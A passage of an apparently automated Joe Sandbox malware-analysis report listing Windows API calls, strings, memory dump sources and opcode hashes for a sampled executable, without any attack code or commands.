                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004434C0
                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83), ref: 0044351C
                                                                                                                                              • LocalReAlloc.KERNEL32(?,?,00000002,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66), ref: 0044352E
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044353B
                                                                                                                                              • TlsSetValue.KERNEL32(?,00000000), ref: 0044356B
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044358C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 784703316-0
                                                                                                                                              • Opcode ID: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                                              • Instruction ID: c920ea616b6941ccf4a41ae28c234557be8e43c86538256f6915913f71204ac3
                                                                                                                                              • Opcode Fuzzy Hash: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                                              • Instruction Fuzzy Hash: 2F31ABB1500615BFEB24EF55D885C6ABBA8FB057117108A2EE81683610CB34FE50CB99
                                                                                                                                              APIs
                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422D73
                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 00422D8B
                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 00422D92
                                                                                                                                              • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00422DB8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                                                              • String ID: B$DISPLAY
                                                                                                                                              • API String ID: 2307409384-3316187204
                                                                                                                                              • Opcode ID: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                                              • Instruction ID: 3a1a5f33e973a52794829ba86540b2c4864c641d0816d9ff10fb2a82ff3ca36e
                                                                                                                                              • Opcode Fuzzy Hash: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                                              • Instruction Fuzzy Hash: 6111A371710334BBCF119F64AD8475BBBA9FF06B50B808466FD05AA145C2F4D801CBA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                                              • String ID: %s\%s$CopyFileExA$KERNEL32.DLL$regsvr32.exe
                                                                                                                                              • API String ID: 497994091-3394410207
                                                                                                                                              • Opcode ID: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                                              • Instruction ID: dbb7616a5e8e18c7340fb9c6e1b10d6890d2dd053081ddfc01aae21a589600a4
                                                                                                                                              • Opcode Fuzzy Hash: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                                              • Instruction Fuzzy Hash: 6B112570108340AFD318DF54DC06BDA7BA4E745B15F400A2EB595932D2EB7C5144CB5A
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,0043D1B4,?,?,?,?,75920A60,00000000,?,00425801,00000000), ref: 00443AF5
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,00425801,00000000), ref: 00443AFD
                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,00425801,00000000), ref: 00443B48
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00443B58
                                                                                                                                                • Part of subcall function 0044399E: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                                                • Part of subcall function 0044399E: PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                                                • Part of subcall function 0044399E: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                                                • Part of subcall function 0044399E: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                                                                                              • API String ID: 4004864024-597752486
                                                                                                                                              • Opcode ID: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                                              • Instruction ID: dbd96a4b6eaa2b3b5d1619ca9b628c41ce02e38444e38533f865fee5f1778688
                                                                                                                                              • Opcode Fuzzy Hash: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                                              • Instruction Fuzzy Hash: BE018B74A003515FE710AF25D849B0E3BE8AF44B05F0684AFF448C7262DB78D945CB6E
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004318D6: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                                              • __allrem.LIBCMT ref: 004295EA
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042960B
                                                                                                                                              • __allrem.LIBCMT ref: 00429627
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042964A
                                                                                                                                              • __allrem.LIBCMT ref: 00429666
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429689
                                                                                                                                                • Part of subcall function 0042DE95: __lock.LIBCMT ref: 0042DEA3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1282128132-0
                                                                                                                                              • Opcode ID: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
                                                                                                                                              • Instruction ID: 20045b1a01943ce18175a09da68eb3b3dac957ec16cd292ee12873f349e9aca1
                                                                                                                                              • Opcode Fuzzy Hash: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
                                                                                                                                              • Instruction Fuzzy Hash: B861E171B00215AFDB28CF69E88096EBBF5FB44314F64812FE055D3291E738AE85CB18
                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0044D18C,00000001,?,0044EB90,00000024,00430BA7,00000001,00000100,00000001,?,?,?,?,?,00426A9F), ref: 004334D0
                                                                                                                                              • GetLastError.KERNEL32(?,?,00426A9F,?,00000100,00000001), ref: 004334E2
                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000100,?,?,0044EB90,00000024,00430BA7,00000001,00000100,00000001,?,?,?,?,?,00426A9F), ref: 0043350C
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000100,?,00000000,00000000,00000000,00000000,0044EB90,00000024,00430BA7,00000001,00000100,00000001,?,?), ref: 00433564
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000100,00000000,?,00000000,00000000,00000000), ref: 004335E7
                                                                                                                                              • GetStringTypeA.KERNEL32(?,?,?,00000000,?), ref: 00433679
                                                                                                                                                • Part of subcall function 00427CAC: __lock.LIBCMT ref: 00427CF0
                                                                                                                                                • Part of subcall function 00427CAC: HeapAlloc.KERNEL32(00000008,?,0044CCF0,00000010,0042AF46,00000001,0000008C,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?), ref: 00427D2E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 892864237-0
                                                                                                                                              • Opcode ID: 41b094fe7ede587f8373936e6811044ce6034eab3902943bc4cb143160f58925
                                                                                                                                              • Instruction ID: cbc897700df3d1e1983acaea7c157d6e20f4ecd83cab76d3576f3f0168d9f9c2
                                                                                                                                              • Opcode Fuzzy Hash: 41b094fe7ede587f8373936e6811044ce6034eab3902943bc4cb143160f58925
                                                                                                                                              • Instruction Fuzzy Hash: 26515E71901219EFCF219FA5EC468AF7BB4FF09765F20552BF810A2260D3389A51CF99
                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0044D18C,00000001,?,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C3D4
                                                                                                                                              • GetLastError.KERNEL32(?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 0042C3E6
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C448
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,?,00000000), ref: 0042C4C6
                                                                                                                                              • GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 0042C4D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3581945363-0
                                                                                                                                              • Opcode ID: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                                              • Instruction ID: 88f62cd8e99c40129225232f1d9a33b4d453174d8dbd23392fe9350ab2a232bf
                                                                                                                                              • Opcode Fuzzy Hash: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                                              • Instruction Fuzzy Hash: 48410471A00234ABCB229F50EC85AEF3B74FF49B54F60451AF800A7250D738DD91CB98
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0043EA91
                                                                                                                                              • GetParent.USER32(?), ref: 0043EA9F
                                                                                                                                              • GetParent.USER32(?), ref: 0043EAB2
                                                                                                                                              • GetLastActivePopup.USER32(?), ref: 0043EAC1
                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 0043EAD6
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 0043EAE9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 670545878-0
                                                                                                                                              • Opcode ID: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                                              • Instruction ID: b535a82bad788ac16eb99c34fc1ef6d385c7c7cd006b6a644f81288a5402ee46
                                                                                                                                              • Opcode Fuzzy Hash: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                                              • Instruction Fuzzy Hash: 451191326073316796317BAB9C4472BA6987F6EB61F161126EC04E3384DB68CC02469E
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0041AF78
                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AF90
                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0041AFA4
                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041AFB4
                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AFC8
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041AFCF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileTime$CloseCreateDateHandleLocal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3223929235-0
                                                                                                                                              • Opcode ID: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                                              • Instruction ID: 3d40798e3b81d1430aab252964cec3372e3fcf11f7589a68c7364f8788f44102
                                                                                                                                              • Opcode Fuzzy Hash: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                                              • Instruction Fuzzy Hash: 3F014F76204302BFD704EF64DD49F9B77ACFF8A704F008918F645D6090E6B0A6098BAA
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 00419247
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 00419257
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: %s\Support\$%s\filelist.txt$Cleanup
                                                                                                                                              • API String ID: 1611563598-1950755567
                                                                                                                                              • Opcode ID: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                                              • Instruction ID: bed570faa51ef1bb4b8ee522f0adb72f7e314e0fe85be6cbe2c67c94b7ad8b4a
                                                                                                                                              • Opcode Fuzzy Hash: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                                              • Instruction Fuzzy Hash: 74512570304704ABD310EF658851BEFB7E5AFC9B08F40490EF54957282DF38A9498BAE
                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 00428EFD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID: ` H$` H$p!H$p!H
                                                                                                                                              • API String ID: 1807457897-1693277582
                                                                                                                                              • Opcode ID: 0904489f7c4f8298eb0a037346f5490ffeb532e29ab21e5ec4c274cf32337989
                                                                                                                                              • Instruction ID: b150ea7fd820ce53cdd54fd6a90056057f137d992ad756a29ea43e502382cc7b
                                                                                                                                              • Opcode Fuzzy Hash: 0904489f7c4f8298eb0a037346f5490ffeb532e29ab21e5ec4c274cf32337989
                                                                                                                                              • Instruction Fuzzy Hash: AB413630B052758EE710DF64EA8427EBBA2AB06304FA9087FD645D7352CB7D4946C74C
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: GlobalLocklstrlen
                                                                                                                                              • String ID: System
                                                                                                                                              • API String ID: 1144527523-3470857405
                                                                                                                                              • Opcode ID: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                                              • Instruction ID: eea6c33846d3fd7b44d8b3261e131be6795de2e39f67e8c264ccda5b0592d447
                                                                                                                                              • Opcode Fuzzy Hash: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                                              • Instruction Fuzzy Hash: B441DE32900219EFCB10DFB9C88699EBBB8FF08314F10922AE916D7241DB389945CF94
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042407C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424096
                                                                                                                                                • Part of subcall function 0042407C: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 004240A7
                                                                                                                                                • Part of subcall function 0042407C: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004240ED
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                                              • GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryVirtual$CurrentDirectoryEnvironmentErrorInfoLastSystemVariable
                                                                                                                                              • String ID: :$=
                                                                                                                                              • API String ID: 209584734-2134709475
                                                                                                                                              • Opcode ID: 7837df4854f14fedd5cad5387f30d956a8220b4b58952e3805e09611b5b97e4a
                                                                                                                                              • Instruction ID: a6265404f4273ac2f1c7f86b0694fd07e9fa6f724056c34767095232113bf715
                                                                                                                                              • Opcode Fuzzy Hash: 7837df4854f14fedd5cad5387f30d956a8220b4b58952e3805e09611b5b97e4a
                                                                                                                                              • Instruction Fuzzy Hash: D311C331A042B98BCF31AF78A8442DEBB745B4A314F8501DFE59453241CA385E92CF59
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416C83
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416C93
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416CF4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: DEBUG$DirectX Reports Reboot Required
                                                                                                                                              • API String ID: 1611563598-3080797097
                                                                                                                                              • Opcode ID: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                                              • Instruction ID: b7ca4d720214f3a145d37d4fa28bcfc633ca5049e0a52a545d8ad53e3cccdc6a
                                                                                                                                              • Opcode Fuzzy Hash: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                                              • Instruction Fuzzy Hash: 6C110C713803415BD3205728DC41BE77794DB56715F06041BF9D5572C1DABAD4C4C2BA
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(mscoree.dll), ref: 004248CA
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004248DA
                                                                                                                                              • ExitProcess.KERNEL32 ref: 004248EE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 75539706-1276376045
                                                                                                                                              • Opcode ID: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                                              • Instruction ID: 1eadc9780b94b6718706bd16444dc68ece41e54e59adc106cdd0224a4c3c19fa
                                                                                                                                              • Opcode Fuzzy Hash: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                                              • Instruction Fuzzy Hash: DAD0C778351341BBD7103F70DD5AE2A7654EF42F0670504357805D0061CB38C900ED2A
                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00424291,?), ref: 0042A4C5
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A543
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A5A8
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A5CC
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A62C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2947987494-0
                                                                                                                                              • Opcode ID: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                                              • Instruction ID: dd5010c10e1d9b9ba543a85cf015812fd413b34cf2729769e49068ff06a4fc39
                                                                                                                                              • Opcode Fuzzy Hash: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                                              • Instruction Fuzzy Hash: FE5107307106219FCB248B58E98472B73A0EB91758FA9856BDC4187291D378EC96874F
                                                                                                                                              APIs
                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 0042D553
                                                                                                                                              • GetFileType.KERNEL32(?), ref: 0042D5FD
                                                                                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 0042D67E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileHandleInfoStartupType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2461013171-0
                                                                                                                                              • Opcode ID: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                                              • Instruction ID: 44458137fe5f849726c5f7ea3ed5670e5a8521186f189f810873b1cd4ff4ad7e
                                                                                                                                              • Opcode Fuzzy Hash: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                                              • Instruction Fuzzy Hash: BA51C571A043118FD720CF28E84476B77E4FB16328F558A2ED5AAC72E1DB78D849C719
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,?), ref: 0042F0C8
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0042F129
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EED4
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000,00000000,00000000), ref: 0042EEDE
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,V^B,V^B,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000), ref: 0042EF33
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EF5A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID: V^B
                                                                                                                                              • API String ID: 1717984340-731569014
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 0042688E
                                                                                                                                                • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterSection__lock
                                                                                                                                              • String ID: @bE$@bE$LmE
